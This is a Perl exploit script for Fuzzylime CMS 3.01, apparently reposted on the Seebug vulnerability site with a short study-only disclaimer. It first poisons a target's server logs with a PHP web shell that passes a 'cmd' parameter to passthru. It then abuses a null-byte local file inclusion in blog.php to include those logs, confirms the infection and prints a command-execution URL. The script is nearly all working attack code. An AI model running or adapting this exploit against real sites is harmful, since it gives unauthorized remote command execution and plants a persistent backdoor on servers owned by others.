#!/usr/bin/perl # Fuzzylime CMS 3.01 LFI / RCE # author : Cod3rZ # website : http://cod3rz.helloweb.eu # # http://[site]/blog.php?file=../[file]\0 # LFI TO RCE use LWP::UserAgent; system("cls"); #system("clear"); print " -------------------------------------------------\n"; print " Fuzzylime CMS 3.01 LFI / RCE \n"; print " Powered by Cod3rZ \n"; print " http://cod3rz.helloweb.eu \n"; print " -------------------------------------------------\n"; print " Insert Site (http://site.com/): \n "; chomp($site = <STDIN>); print " -------------------------------------------------\n"; print " Insert Logs path \n "; chomp($path = <STDIN>); print " -------------------------------------------------\n"; #Infect Logs $lwp = LWP::UserAgent->new; $siten = $site.'/blog.php?file='; $ua = $lwp->get($site.'coderz <?php passthru(stripslashes($_GET[cmd])); ?> /coderz'); #Control $ua = $lwp->get($site.$path.'%00'); if($ua->content =~ m/cod3rz/) { print " Ok ".$site." is infected \n"; print " -------------------------------------------------\n"; print " ".$siten.$path."&cmd=[command]\\0 \n"; print " -------------------------------------------------\n"; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论